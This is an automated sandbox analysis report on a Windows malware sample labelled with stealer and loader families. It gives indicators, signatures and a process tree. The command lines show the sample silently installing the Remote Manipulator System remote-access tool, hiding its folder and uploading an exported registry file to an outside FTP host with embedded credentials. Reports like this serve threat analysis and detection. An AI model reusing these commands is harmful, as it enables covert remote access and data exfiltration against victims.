Analysis
-
max time kernel: 148s
max time network: 144s
platform: windows11-21h2_x64
resource: win11-20250502-en
resource tags: arch:x64, arch:x86, image:win11-20250502-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 20/05/2025, 14:06
Static task: static1
Behavioral task: behavioral1
  Sample: 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
  Resource: win10v2004-20250502-en
Behavioral task: behavioral2
  Sample: 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
  Resource: win11-20250502-en
General
-
Target: 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
Size: 9.1MB
MD5: 5626d4dd5d06b612402dc73b85243a7d
SHA1: 4111fa3b9fb47fc1fecad64e7b439251b89b724e
SHA256: a637241e14f11384415f02c09c63349c7b6a7e7e6b0eea58932c24f7650d0341
SHA512: 03b5f6f84dab5a384003cdf8fad17c6c4214276f871e673352939514bd0120dda24cb644fcc0a76060d82d6d7e69f8822471e18ef2d2acd170f258aabb1a366b
SSDEEP: 196608:iXKLL3IgcLx6WYo7JuSRZexCi/lk6/iljv4LX7XobiyUe/i/fnaDx:vL4pljJb+xCAlql74zjozR/iXo
Malware Config
Signatures
-
Rms family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rutserv.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rfusclient.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rfusclient.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rfusclient.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rutserv.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rutserv.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rutserv.exe
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid | Process
4876 | attrib.exe
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource | yara_rule
behavioral2/files/0x001a00000002b04f-178.dat | acprotect
behavioral2/files/0x001b00000002b04c-177.dat | acprotect
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rfusclient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rfusclient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rfusclient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rutserv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rutserv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rutserv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rutserv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rutserv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rfusclient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rfusclient.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rutserv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rutserv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rutserv.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rfusclient.exe
-
Executes dropped EXE 13 IoCs
pid | Process
4448 | 123.exe
4472 | rCceQHavD.exe
2300 | rutserv.exe
5116 | wVJxOQKKa.exe
1968 | rutserv.exe
2372 | wVJxOQKKa.exe
2180 | rutserv.exe
5320 | rutserv.exe
5432 | rfusclient.exe
5304 | rfusclient.exe
2464 | id.exe
3032 | rfusclient.exe
5148 | fcp.exe
-
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | rutserv.exe
Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | rutserv.exe
Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | rfusclient.exe
Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | rfusclient.exe
Key opened | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000\Software\Wine | rutserv.exe
-
Loads dropped DLL 1 IoCs
pid | Process
5148 | fcp.exe
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid | Process
2300 | rutserv.exe
1968 | rutserv.exe
2180 | rutserv.exe
5320 | rutserv.exe
5432 | rfusclient.exe
5304 | rfusclient.exe
3032 | rfusclient.exe
-
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 4472 set thread context of 3752 | 4472 | rCceQHavD.exe | 93
PID 5116 set thread context of 2372 | 5116 | wVJxOQKKa.exe | 97
-
resource | yara_rule
behavioral2/files/0x001a00000002b04f-178.dat | upx
behavioral2/files/0x001b00000002b04c-177.dat | upx
-
Drops file in Program Files directory 25 IoCs
description | ioc | Process
File opened for modification | C:\Program Files (x86)\System\rutserv.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System | attrib.exe
File opened for modification | C:\Program Files (x86)\SmalRestore\SmalRestore\Uninstall.exe | 123.exe
File created | C:\Program Files (x86)\SmalRestore\SmalRestore\Uninstall.ini | 123.exe
File opened for modification | C:\Program Files (x86)\System | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\__tmp_rar_sfx_access_check_240619671 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\vp8decoder.dll | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\vp8decoder.dll | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\vp8encoder.dll | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\regedit.reg | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\regedit.reg | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\install.bat | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\vp8encoder.dll | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\id.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\rfusclient.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\rfusclient.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\123.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\install.vbs | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\install.vbs | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\test.vbs | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\id.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\install.bat | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\123.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File opened for modification | C:\Program Files (x86)\System\test.vbs | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
File created | C:\Program Files (x86)\System\rutserv.exe | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 123.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rutserv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rutserv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | timeout.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rfusclient.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | attrib.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rCceQHavD.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | id.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | fcp.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wVJxOQKKa.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | reg.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | regedit.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rutserv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rutserv.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rfusclient.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | taskkill.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | wVJxOQKKa.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | rfusclient.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | regedit.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
-
Delays execution with timeout.exe 2 IoCs
pid | Process
2404 | timeout.exe
5092 | timeout.exe
-
Kills process with taskkill 2 IoCs
pid | Process
2840 | taskkill.exe
4332 | taskkill.exe
-
Modifies registry class 2 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
Key created | \REGISTRY\USER\S-1-5-21-434880884-4028056734-3558218839-1000_Classes\Local Settings | id.exe
-
Runs .reg file with regedit 2 IoCs
pid | Process
2212 | regedit.exe
3580 | regedit.exe
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
pid | Process
4472 | rCceQHavD.exe
4472 | rCceQHavD.exe
2300 | rutserv.exe
2300 | rutserv.exe
2300 | rutserv.exe
2300 | rutserv.exe
2300 | rutserv.exe
2300 | rutserv.exe
2300 | rutserv.exe
2300 | rutserv.exe
1968 | rutserv.exe
1968 | rutserv.exe
1968 | rutserv.exe
1968 | rutserv.exe
2180 | rutserv.exe
2180 | rutserv.exe
2180 | rutserv.exe
2180 | rutserv.exe
5320 | rutserv.exe
5320 | rutserv.exe
5320 | rutserv.exe
5320 | rutserv.exe
5320 | rutserv.exe
5320 | rutserv.exe
5320 | rutserv.exe
5320 | rutserv.exe
5432 | rfusclient.exe
5432 | rfusclient.exe
5304 | rfusclient.exe
5304 | rfusclient.exe
5304 | rfusclient.exe
5304 | rfusclient.exe
3032 | rfusclient.exe
3032 | rfusclient.exe
-
Suspicious behavior: SetClipboardViewer 1 IoCs
pid | Process
3032 | rfusclient.exe
-
Suspicious use of AdjustPrivilegeToken 10 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2840 | taskkill.exe
Token: SeDebugPrivilege | 4332 | taskkill.exe
Token: SeDebugPrivilege | 4472 | rCceQHavD.exe
Token: SeDebugPrivilege | 2300 | rutserv.exe
Token: SeDebugPrivilege | 5116 | wVJxOQKKa.exe
Token: SeDebugPrivilege | 2180 | rutserv.exe
Token: SeTakeOwnershipPrivilege | 5320 | rutserv.exe
Token: SeTcbPrivilege | 5320 | rutserv.exe
Token: SeTcbPrivilege | 5320 | rutserv.exe
Token: SeDebugPrivilege | 2372 | wVJxOQKKa.exe
-
Suspicious use of SetWindowsHookEx 4 IoCs
pid | Process
2300 | rutserv.exe
1968 | rutserv.exe
2180 | rutserv.exe
5320 | rutserv.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2164 wrote to memory of 3132 | 2164 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 78
PID 2164 wrote to memory of 3132 | 2164 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 78
PID 2164 wrote to memory of 3132 | 2164 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 78
PID 2164 wrote to memory of 676 | 2164 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 79
PID 2164 wrote to memory of 676 | 2164 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 79
PID 2164 wrote to memory of 676 | 2164 | 2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe | 79
PID 676 wrote to memory of 4448 | 676 | WScript.exe | 80
PID 676 wrote to memory of 4448 | 676 | WScript.exe | 80
PID 676 wrote to memory of 4448 | 676 | WScript.exe | 80
PID 3132 wrote to memory of 3888 | 3132 | WScript.exe | 81
PID 3132 wrote to memory of 3888 | 3132 | WScript.exe | 81
PID 3132 wrote to memory of 3888 | 3132 | WScript.exe | 81
PID 3888 wrote to memory of 4876 | 3888 | cmd.exe | 83
PID 3888 wrote to memory of 4876 | 3888 | cmd.exe | 83
PID 3888 wrote to memory of 4876 | 3888 | cmd.exe | 83
PID 3888 wrote to memory of 2840 | 3888 | cmd.exe | 84
PID 3888 wrote to memory of 2840 | 3888 | cmd.exe | 84
PID 3888 wrote to memory of 2840 | 3888 | cmd.exe | 84
PID 4448 wrote to memory of 4472 | 4448 | 123.exe | 86
PID 4448 wrote to memory of 4472 | 4448 | 123.exe | 86
PID 4448 wrote to memory of 4472 | 4448 | 123.exe | 86
PID 3888 wrote to memory of 4332 | 3888 | cmd.exe | 87
PID 3888 wrote to memory of 4332 | 3888 | cmd.exe | 87
PID 3888 wrote to memory of 4332 | 3888 | cmd.exe | 87
PID 3888 wrote to memory of 4628 | 3888 | cmd.exe | 88
PID 3888 wrote to memory of 4628 | 3888 | cmd.exe | 88
PID 3888 wrote to memory of 4628 | 3888 | cmd.exe | 88
PID 3888 wrote to memory of 2212 | 3888 | cmd.exe | 89
PID 3888 wrote to memory of 2212 | 3888 | cmd.exe | 89
PID 3888 wrote to memory of 2212 | 3888 | cmd.exe | 89
PID 3888 wrote to memory of 2404 | 3888 | cmd.exe | 90
PID 3888 wrote to memory of 2404 | 3888 | cmd.exe | 90
PID 3888 wrote to memory of 2404 | 3888 | cmd.exe | 90
PID 4472 wrote to memory of 1284 | 4472 | rCceQHavD.exe | 92
PID 4472 wrote to memory of 1284 | 4472 | rCceQHavD.exe | 92
PID 4472 wrote to memory of 1284 | 4472 | rCceQHavD.exe | 92
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 4472 wrote to memory of 3752 | 4472 | rCceQHavD.exe | 93
PID 3888 wrote to memory of 2300 | 3888 | cmd.exe | 94
PID 3888 wrote to memory of 2300 | 3888 | cmd.exe | 94
PID 3888 wrote to memory of 2300 | 3888 | cmd.exe | 94
PID 4448 wrote to memory of 5116 | 4448 | 123.exe | 95
PID 4448 wrote to memory of 5116 | 4448 | 123.exe | 95
PID 4448 wrote to memory of 5116 | 4448 | 123.exe | 95
PID 3888 wrote to memory of 1968 | 3888 | cmd.exe | 96
PID 3888 wrote to memory of 1968 | 3888 | cmd.exe | 96
PID 3888 wrote to memory of 1968 | 3888 | cmd.exe | 96
PID 5116 wrote to memory of 2372 | 5116 | wVJxOQKKa.exe | 97
PID 5116 wrote to memory of 2372 | 5116 | wVJxOQKKa.exe | 97
PID 5116 wrote to memory of 2372 | 5116 | wVJxOQKKa.exe | 97
PID 5116 wrote to memory of 2372 | 5116 | wVJxOQKKa.exe | 97
PID 5116 wrote to memory of 2372 | 5116 | wVJxOQKKa.exe | 97
PID 5116 wrote to memory of 2372 | 5116 | wVJxOQKKa.exe | 97
PID 5116 wrote to memory of 2372 | 5116 | wVJxOQKKa.exe | 97
PID 5116 wrote to memory of 2372 | 5116 | wVJxOQKKa.exe | 97
PID 3888 wrote to memory of 2180 | 3888 | cmd.exe | 98
PID 3888 wrote to memory of 2180 | 3888 | cmd.exe | 98
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid | Process
4876 | attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\2025-05-20_5626d4dd5d06b612402dc73b85243a7d_amadey_elex_gcleaner_smoke-loader_stealc_tofsee.exe"
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 2164
  -
  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 3132
    -
    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 3888
      -
      C:\Windows\SysWOW64\attrib.exe
        Command line: attrib +s +h "C:\Program Files (x86)\System"
        - Sets file to hidden
        - Drops file in Program Files directory
        - System Location Discovery: System Language Discovery
        - Views/modifies file attributes
        PID: 4876
      -
      C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im rutserv.exe
        - System Location Discovery: System Language Discovery
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
        PID: 2840
      -
      C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /f /im rfusclient.exe
        - System Location Discovery: System Language Discovery
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
        PID: 4332
      -
      C:\Windows\SysWOW64\reg.exe
        Command line: reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
        - System Location Discovery: System Language Discovery
        PID: 4628
      -
      C:\Windows\SysWOW64\regedit.exe
        Command line: regedit /s "regedit.reg"
        - System Location Discovery: System Language Discovery
        - Runs .reg file with regedit
        PID: 2212
      -
      C:\Windows\SysWOW64\timeout.exe
        Command line: timeout 2
        - System Location Discovery: System Language Discovery
        - Delays execution with timeout.exe
        PID: 2404
      -
      C:\Program Files (x86)\System\rutserv.exe
        Command line: rutserv.exe /silentinstall
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        PID: 2300
      -
      C:\Program Files (x86)\System\rutserv.exe
        Command line: rutserv.exe /firewall
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of SetWindowsHookEx
        PID: 1968
      -
      C:\Program Files (x86)\System\rutserv.exe
        Command line: rutserv.exe /start
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of SetWindowsHookEx
        PID: 2180
      -
      C:\Windows\SysWOW64\timeout.exe
        Command line: timeout 2
        - System Location Discovery: System Language Discovery
        - Delays execution with timeout.exe
        PID: 5092
      -
      C:\Windows\SysWOW64\regedit.exe
        Command line: regedit.exe -ea C:\backup.reg "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4\Server\Parameters"
        - System Location Discovery: System Language Discovery
        - Runs .reg file with regedit
        PID: 3580
    -
    C:\Program Files (x86)\System\id.exe
      Command line: "C:\Program Files (x86)\System\id.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Modifies registry class
      PID: 2464
      -
      C:\Windows\SysWOW64\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\id.vbs"
        - System Location Discovery: System Language Discovery
        PID: 1792
        -
        C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\id.bat" "
          - System Location Discovery: System Language Discovery
          PID: 1092
          -
          C:\Users\Admin\AppData\Local\Temp\fcp.exe
            Command line: fcp --user="x95244d7_fgsdfg" --pass="9pKpGW4W" --server="x95244d7.beget.tech" --file=C:\backup.reg
            - Executes dropped EXE
            - Loads dropped DLL
            - System Location Discovery: System Language Discovery
            PID: 5148
  -
  C:\Windows\SysWOW64\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\test.vbs"
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 676
    -
    C:\Program Files (x86)\System\123.exe
      Command line: "C:\Program Files (x86)\System\123.exe"
      - Executes dropped EXE
      - Drops file in Program Files directory
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 4448
      -
      C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\rCceQHavD.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 4472
        -
        C:\Windows\SysWOW64\svchost.exe
          Command line: "C:\Windows\System32\svchost.exe"
          PID: 1284
        -
        C:\Windows\SysWOW64\svchost.exe
          Command line: "C:\Windows\System32\svchost.exe"
          - System Location Discovery: System Language Discovery
          PID: 3752
      -
      C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 5116
        -
        C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\wVJxOQKKa.exe"
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          - Suspicious use of AdjustPrivilegeToken
          PID: 2372
-
C:\Program Files (x86)\System\rutserv.exe
  Command line: "C:\Program Files (x86)\System\rutserv.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID: 5320
  -
  C:\Program Files (x86)\System\rfusclient.exe
    Command line: "C:\Program Files (x86)\System\rfusclient.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID: 5304
    -
    C:\Program Files (x86)\System\rfusclient.exe
      Command line: "C:\Program Files (x86)\System\rfusclient.exe" /tray
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Identifies Wine through registry keys
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: SetClipboardViewer
      PID: 3032
  -
  C:\Program Files (x86)\System\rfusclient.exe
    Command line: "C:\Program Files (x86)\System\rfusclient.exe" /tray
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID: 5432
-
Network
MITRE ATT&CK Enterprise v16
Downloads